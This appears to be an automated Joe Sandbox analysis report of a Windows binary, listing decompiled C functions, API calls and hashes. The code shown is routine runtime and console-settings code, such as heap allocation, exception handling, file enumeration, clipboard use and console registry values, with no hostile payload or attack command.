                                              0x00b11f16
                                              0x00b11f19
                                              0x00b11f1e
                                              0x00b11f25
                                              0x00b11f2b
                                              0x00b11f2e
                                              0x00b11f33
                                              0x00b11f3a
                                              0x00b11f4d
                                              0x00b11f53
                                              0x00b11f56
                                              0x00b11f5b
                                              0x00b11f5e
                                              0x00b11f65
                                              0x00b11f91
                                              0x00000000
                                              0x00b11f6b
                                              0x00b11f71
                                              0x00b11f74
                                              0x00b11f79
                                              0x00b11f7c
                                              0x00b11f7f
                                              0x00000000
                                              0x00b11f85
                                              0x00b11f85
                                              0x00b11f85
                                              0x00b11f7f
                                              0x00b11f40
                                              0x00b11f40
                                              0x00b11f47
                                              0x00b11f96
                                              0x00b11fa0
                                              0x00b12051
                                              0x00b1205a
                                              0x00b1205d
                                              0x00b12069
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b11f47
                                              0x00b11f3a
                                              0x00b11ef3
                                              0x00b11ef3
                                              0x00b11ef3
                                              0x00b11e90
                                              0x00b11e90
                                              0x00b11e90
                                              0x00b11b6a
                                              0x00b11b6a
                                              0x00b11b6a
                                              0x00b1193f
                                              0x00b1193f
                                              0x00b1193f
                                              0x00b1206c
                                              0x00b12078

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: File$AllocCreateReadSizeVirtual
                                              • String ID: --headless$--height$--server$--signal$--unix$--width$@$P$T
                                              • API String ID: 4119528295-967118136
                                              • Opcode ID: 4edaf7b2242fc36200ea1a338265ef6fab43698d769cdd525ba48b32d179188f
                                              • Instruction ID: 22302183b55aa192aef797c274213b843b500ec893bfa0413a7b07481166a02b
                                              • Opcode Fuzzy Hash: 4edaf7b2242fc36200ea1a338265ef6fab43698d769cdd525ba48b32d179188f
                                              • Instruction Fuzzy Hash: 8A220670809218CFDB10DFA8D588BADBBF0FF48304F5089ADE845AB291DB759995CF52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1D720 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 146 b1d720-b1d72b SetUnhandledExceptionFilter
                                              C-Code - Quality: 100%
                                              			E00B1D720() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00B1D847); // executed
				return _t1;
			}




                                              0x00b1d725
                                              0x00b1d72b

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_0000D847,00B1D1A3), ref: 00B1D725
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 515ac2ff6c279ebccdcb31c1266c9a2566d74c95f37fceede584e5099d7c23be
                                              • Instruction ID: f58d0c2eede8f2ecb7da96faf5d86cdf0998c099aad0bc16dc500b921c359bf2
                                              • Opcode Fuzzy Hash: 515ac2ff6c279ebccdcb31c1266c9a2566d74c95f37fceede584e5099d7c23be
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B24871 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 115 b24871-b2487c 116 b2488a-b24890 115->116 117 b2487e-b24888 115->117 119 b24892-b24893 116->119 120 b248a9-b248ba RtlAllocateHeap 116->120 117->116 118 b248be-b248c9 call b247e4 117->118 126 b248cb-b248cd 118->126 119->120 122 b24895-b2489c call b20efd 120->122 123 b248bc 120->123 122->118 128 b2489e-b248a7 call b239ff 122->128 123->126 128->118 128->120
                                              C-Code - Quality: 100%
                                              			E00B24871(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xb362dc, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00B20EFD();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00B247E4())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00B239FF(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}








                                              0x00b24877
                                              0x00b2487c
                                              0x00b2488a
                                              0x00b2488a
                                              0x00b24890
                                              0x00b24892
                                              0x00b24892
                                              0x00b248a9
                                              0x00b248b2
                                              0x00b248ba
                                              0x00000000
                                              0x00000000
                                              0x00b2489a
                                              0x00b2489c
                                              0x00b248be
                                              0x00b248c3
                                              0x00b248c9
                                              0x00000000
                                              0x00b248c9
                                              0x00b2489f
                                              0x00b248a5
                                              0x00b248a7
                                              0x00000000
                                              0x00000000
                                              0x00b248a7
                                              0x00000000
                                              0x00b248a9
                                              0x00b24882
                                              0x00b24888
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B2278A,00000001,00000364,00000000,00000007,000000FF,?,?,00B247E9,00B236F8), ref: 00B248B2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: b63348f93e8ceeff4c2318392612b5ce98899083cde4b5cff0969d879d326c44
                                              • Instruction ID: b3bb1097a1216f33983e73242e2099540980ef7a820d704d1126eaf9f6a425e2
                                              • Opcode Fuzzy Hash: b63348f93e8ceeff4c2318392612b5ce98899083cde4b5cff0969d879d326c44
                                              • Instruction Fuzzy Hash: BAF0E9326246B46EEB216E25BC05B6B77CDEF42760B2586B1AC0DDF990CF70DC0486E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B248CE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 131 b248ce-b248da 132 b2490c-b24917 call b247e4 131->132 133 b248dc-b248de 131->133 140 b24919-b2491b 132->140 135 b248e0-b248e1 133->135 136 b248f7-b24908 RtlAllocateHeap 133->136 135->136 137 b248e3-b248ea call b20efd 136->137 138 b2490a 136->138 137->132 143 b248ec-b248f5 call b239ff 137->143 138->140 143->132 143->136
                                              C-Code - Quality: 100%
                                              			E00B248CE(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00B247E4())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xb362dc, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00B20EFD();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00B239FF(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}






                                              0x00b248d4
                                              0x00b248da
                                              0x00b2490c
                                              0x00b24911
                                              0x00b24917
                                              0x00000000
                                              0x00b24917
                                              0x00b248de
                                              0x00b248e0
                                              0x00b248e0
                                              0x00b248f7
                                              0x00b24900
                                              0x00b24908
                                              0x00000000
                                              0x00000000
                                              0x00b248e8
                                              0x00b248ea
                                              0x00000000
                                              0x00000000
                                              0x00b248ed
                                              0x00b248f3
                                              0x00b248f5
                                              0x00000000
                                              0x00000000
                                              0x00b248f5
                                              0x00000000

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00B25E38,?,?,?,00B156F0), ref: 00B24900
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 67ecb26c07e1d9f59ba657791fae4e1be56613e616e60035cab9a9f4720e077e
                                              • Instruction ID: a823bb5d00888e3a7c372f8a7d8fb31b69d11f1a9e28b9c8cefb0670453eace2
                                              • Opcode Fuzzy Hash: 67ecb26c07e1d9f59ba657791fae4e1be56613e616e60035cab9a9f4720e077e
                                              • Instruction Fuzzy Hash: 07E06D352116756EEB213AA5BC05B5B3BCCDB427A0F6641A1AC1D9A8D1CF60CC91C2A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 00B1C4C0 Relevance: 74.0, APIs: 24, Strings: 18, Instructions: 467registrystringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 279 b1c4c0-b1c4d8 280 b1c4f9 279->280 281 b1c4de-b1c4f6 call b13370 279->281 283 b1c503-b1c527 280->283 281->280 286 b1c5e1-b1c5e5 283->286 287 b1c52d-b1c531 283->287 290 b1c5eb-b1c5f7 286->290 291 b1c5fd-b1c643 RegSetValueExW 286->291 288 b1c537-b1c550 287->288 289 b1c556-b1c5c5 wsprintfW RegSetValueExW 287->289 288->289 292 b1c5c8-b1c5dc 288->292 289->292 290->291 293 b1c646-b1c64a 290->293 291->293 292->283 295 b1c650-b1c65c 293->295 296 b1c662-b1c6a8 RegSetValueExW 293->296 295->296 297 b1c6ab-b1c6af 295->297 296->297 298 b1c6b5-b1c6c1 297->298 299 b1c6c7-b1c710 RegSetValueExW 297->299 298->299 300 b1c713-b1c717 298->300 299->300 301 b1c74a-b1c79d lstrlenW RegSetValueExW 300->301 302 b1c71d-b1c744 lstrcmpW 300->302 303 b1c7a0-b1c7a4 301->303 302->301 302->303 304 b1c7aa-b1c7b6 303->304 305 b1c7bc-b1c805 RegSetValueExW 303->305 304->305 306 b1c808-b1c80c 304->306 305->306 307 b1c812-b1c81e 306->307 308 b1c836-b1c8ec GetDpiForSystem MulDiv GetDpiForSystem MulDiv RegSetValueExW 306->308 307->308 309 b1c824-b1c830 307->309 310 b1c8ef-b1c8f3 308->310 309->308 309->310 311 b1c8f9-b1c905 310->311 312 b1c90b-b1c954 RegSetValueExW 310->312 311->312 313 b1c957-b1c95b 311->313 312->313 314 b1c961-b1c96a 313->314 315 b1c970-b1c9b6 RegSetValueExW 313->315 314->315 316 b1c9b9-b1c9bd 314->316 315->316 317 b1c9c3-b1c9cc 316->317 318 b1c9d2-b1ca18 RegSetValueExW 316->318 317->318 319 b1ca1b-b1ca1f 317->319 318->319 320 b1ca25-b1ca2e 319->320 321 b1ca34-b1ca7a RegSetValueExW 319->321 320->321 322 b1ca7d-b1ca81 320->322 321->322 323 b1ca87-b1ca90 322->323 324 b1ca96-b1cadc RegSetValueExW 322->324 323->324 325 b1cadf-b1cae3 323->325 324->325 326 b1cae9-b1caf2 325->326 327 b1caf8-b1cb3e RegSetValueExW 325->327 326->327 328 b1cb41-b1cb45 326->328 327->328 329 b1cb4b-b1cb54 328->329 330 b1cb5a-b1cba0 RegSetValueExW 328->330 329->330 331 b1cba3-b1cba7 329->331 330->331 332 b1cbcb-b1cc2d RegSetValueExW 331->332 333 b1cbad-b1cbb6 331->333 335 b1cc30-b1cc34 332->335 333->332 334 b1cbbc-b1cbc5 333->334 334->332 334->335 336 b1cc3a-b1cc46 335->336 337 b1cc4c-b1cc92 RegSetValueExW 335->337 336->337 338 b1cc95-b1cc99 336->338 337->338 339 b1ccbd-b1cd1f RegSetValueExW 338->339 340 b1cc9f-b1cca8 338->340 342 b1cd22-b1cd2b 339->342 340->339 341 b1ccae-b1ccb7 340->341 341->339 341->342
                                              APIs
                                              • wsprintfW.USER32 ref: 00B1C573
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C5BF
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C63D
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C6A2
                                                • Part of subcall function 00B13370: GetDpiForSystem.USER32 ref: 00B133DC
                                                • Part of subcall function 00B13370: MulDiv.KERNEL32 ref: 00B133F5
                                                • Part of subcall function 00B13370: GetDpiForSystem.USER32 ref: 00B13406
                                                • Part of subcall function 00B13370: MulDiv.KERNEL32 ref: 00B1341F
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C70A
                                              • lstrcmpW.KERNEL32 ref: 00B1C738
                                              • lstrlenW.KERNEL32 ref: 00B1C755
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C797
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C7FF
                                              • GetDpiForSystem.USER32 ref: 00B1C836
                                              • MulDiv.KERNEL32 ref: 00B1C851
                                              • GetDpiForSystem.USER32 ref: 00B1C860
                                              • MulDiv.KERNEL32 ref: 00B1C87B
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C8E6
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C94E
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C9B0
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CA12
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CA74
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CAD6
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CB38
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CB9A
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CC27
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CC8C
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CD19
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: Value$System$lstrcmplstrlenwsprintf
                                              • String ID: ColorTable%02d$CursorSize$CursorVisible$EditionMode$FaceName$FontPitchFamily$FontSize$FontWeight$HistoryBufferSize$HistoryNoDup$InsertMode$MenuMask$PopupColors$QuickEdit$ScreenBufferSize$ScreenColors$WindowSize$`
                                              • API String ID: 4202061470-2238697219
                                              • Opcode ID: ba1c7720fa1e37a0f3441f97c05695e7f5c381332ef9af077c10e98ea68d71bb
                                              • Instruction ID: acf5f16e9a8420ff3c5436d47148dc659625f51929adf920b297818597f44de6
                                              • Opcode Fuzzy Hash: ba1c7720fa1e37a0f3441f97c05695e7f5c381332ef9af077c10e98ea68d71bb
                                              • Instruction Fuzzy Hash: 9932C4B0904219DFDB10DF58C484BAEBBF0FF48314F5089AAE9599B250D774DA88CF92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1ACA0 Relevance: 12.1, APIs: 8, Instructions: 98clipboardkeyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ClipboardGlobal$CloseDataLockOpenScanSizeUnlockVirtual
                                              • String ID:
                                              • API String ID: 1615112705-0
                                              • Opcode ID: 6d6de88af16d0c0ec8bac536dccc27cb8c7b65cb9f368fd13322467ccdf4960e
                                              • Instruction ID: 4cd068ca660278c9a0c3206e0b6c186b534b1bc88c39ca321e366e83c1ffa83a
                                              • Opcode Fuzzy Hash: 6d6de88af16d0c0ec8bac536dccc27cb8c7b65cb9f368fd13322467ccdf4960e
                                              • Instruction Fuzzy Hash: 0141D4B5904218EFDB00EFA8D5896ADBBF0FF04304F108969E885A7350EB75A594CB56
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B25347 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E00B25347(WCHAR* _a4, signed int _a8, char* _a12) {
				signed int _v8;
				short _v552;
				short _v554;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				signed int _v608;
				signed int _v612;
				intOrPtr _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed char _t32;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				int _t48;
				signed int* _t59;
				char* _t60;
				WCHAR* _t68;
				signed int _t70;
				void* _t71;

				_t30 =  *0xb34050; // 0x245fde3e
				_v8 = _t30 ^ _t70;
				_t65 = _a8;
				_t60 = _a12;
				_t68 = _a4;
				_v608 = _t60;
				if(_t65 != _t68) {
					while(E00B254BD( *_t65 & 0x0000ffff) == 0) {
						_t65 = _t65 - 2;
						if(_t65 != _t68) {
							continue;
						}
						break;
					}
					_t60 = _v608;
				}
				_t69 =  *_t65 & 0x0000ffff;
				if(( *_t65 & 0x0000ffff) != 0x3a) {
					L8:
					_t60 =  &_v601;
					_t32 = E00B254BD(_t69);
					_t65 = (_t65 - _t68 >> 1) + 1;
					asm("sbb eax, eax");
					_t59 = 0;
					_v612 =  ~(_t32 & 0x000000ff) & _t65;
					_t69 = FindFirstFileExW(_t68, 0,  &_v600, 0, 0, 0);
					if(_t69 != 0xffffffff) {
						_t59 = _v608;
						_v608 = _t59[1] -  *_t59 >> 2;
						_t41 = 0x2e;
						do {
							if(_v600.cFileName != _t41 || _v554 != 0 && (_v554 != _t41 || _v552 != 0)) {
								_push(_t59);
								_t43 = E00B25293(_t60,  &(_v600.cFileName), _t68, _v612);
								_t71 = _t71 + 0x10;
								_v616 = _t43;
								if(_t43 != 0) {
									FindClose(_t69);
									_t45 = _v616;
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
							goto L21;
							L16:
							_t48 = FindNextFileW(_t69,  &_v600);
							_t41 = 0x2e;
						} while (_t48 != 0);
						_t65 =  *_t59;
						_t63 = _v608;
						_t51 = _t59[1] -  *_t59 >> 2;
						if(_v608 != _t59[1] -  *_t59 >> 2) {
							E00B280B0(_t65, _t65 + _t63 * 4, _t51 - _t63, 4, E00B254E1);
						}
						FindClose(_t69);
						_t45 = 0;
					} else {
						_push(_v608);
						goto L7;
					}
				} else {
					_t8 =  &(_t68[1]); // 0x2
					if(_t65 == _t8) {
						goto L8;
					} else {
						_push(_t60);
						_t59 = 0;
						L7:
						_t45 = E00B25293(_t60, _t68, _t59, _t59);
					}
				}
				L21:
				return E00B1DB25(_t45, _t59, _v8 ^ _t70, _t65, _t68, _t69);
			}

























                                              0x00b25352
                                              0x00b25359
                                              0x00b2535c
                                              0x00b2535f
                                              0x00b25365
                                              0x00b25368
                                              0x00b25370
                                              0x00b25372
                                              0x00b25385
                                              0x00b2538a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b2538a
                                              0x00b2538c
                                              0x00b2538c
                                              0x00b25392
                                              0x00b25398
                                              0x00b253b4
                                              0x00b253b5
                                              0x00b253bb
                                              0x00b253c7
                                              0x00b253ca
                                              0x00b253cc
                                              0x00b253d3
                                              0x00b253e8
                                              0x00b253ed
                                              0x00b253f7
                                              0x00b25407
                                              0x00b2540d
                                              0x00b2540e
                                              0x00b25415
                                              0x00b25434
                                              0x00b25443
                                              0x00b25448
                                              0x00b2544b
                                              0x00b25453
                                              0x00b254a2
                                              0x00b254a8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b25455
                                              0x00b2545d
                                              0x00b25467
                                              0x00b25467
                                              0x00b2546d
                                              0x00b25471
                                              0x00b25477
                                              0x00b2547c
                                              0x00b25497
                                              0x00b2549c
                                              0x00b2547f
                                              0x00b25485
                                              0x00b253ef
                                              0x00b253ef
                                              0x00000000
                                              0x00b253ef
                                              0x00b2539a
                                              0x00b2539a
                                              0x00b2539f
                                              0x00000000
                                              0x00b253a1
                                              0x00b253a1
                                              0x00b253a2
                                              0x00b253a4
                                              0x00b253a7
                                              0x00b253ac
                                              0x00b2539f
                                              0x00b254ae
                                              0x00b254bc

                                              APIs
                                              • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B253E2
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00B2545D
                                              • FindClose.KERNEL32(00000000), ref: 00B2547F
                                              • FindClose.KERNEL32(00000000), ref: 00B254A2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: Find$CloseFile$FirstNext
                                              • String ID:
                                              • API String ID: 1164774033-0
                                              • Opcode ID: b2304af92319fcb0ce3991e0d846fd50eadd60316be8c8ecf029de1ab0df6db8
                                              • Instruction ID: 50e4f1f5ef63a87805db371edfdb36c42f34ce19a56395bd95fd6ec0fb883604
                                              • Opcode Fuzzy Hash: b2304af92319fcb0ce3991e0d846fd50eadd60316be8c8ecf029de1ab0df6db8
                                              • Instruction Fuzzy Hash: D741D371901939AEDB30EF68ED88ABEB3F9EB84355F1041D5E41997244EB309EC08B64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1D72C Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E00B1D72C(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00B1D6A0(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00B1FC30(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00B1FC30(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00B1D6A0(_t49);
				}
				return _t49;
			}


































                                              0x00b1d72c
                                              0x00b1d72c
                                              0x00b1d72c
                                              0x00b1d740
                                              0x00b1d742
                                              0x00b1d745
                                              0x00b1d745
                                              0x00b1d749
                                              0x00b1d74e
                                              0x00b1d766
                                              0x00b1d76c
                                              0x00b1d772
                                              0x00b1d778
                                              0x00b1d77e
                                              0x00b1d784
                                              0x00b1d78a
                                              0x00b1d791
                                              0x00b1d798
                                              0x00b1d79f
                                              0x00b1d7a6
                                              0x00b1d7ad
                                              0x00b1d7b4
                                              0x00b1d7b5
                                              0x00b1d7be
                                              0x00b1d7c4
                                              0x00b1d7c7
                                              0x00b1d7cd
                                              0x00b1d7dc
                                              0x00b1d7e8
                                              0x00b1d7f3
                                              0x00b1d7fa
                                              0x00b1d801
                                              0x00b1d80c
                                              0x00b1d814
                                              0x00b1d81d
                                              0x00b1d81f
                                              0x00b1d822
                                              0x00b1d824
                                              0x00b1d82e
                                              0x00b1d836
                                              0x00b1d83c
                                              0x00000000
                                              0x00b1d843
                                              0x00b1d846

                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B1D738
                                              • IsDebuggerPresent.KERNEL32 ref: 00B1D804
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B1D824
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00B1D82E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                              • String ID:
                                              • API String ID: 254469556-0
                                              • Opcode ID: 2c2784d2ecf431b48aa1493d6e8a09912a790838d45e40f36d11ef52c3a37237
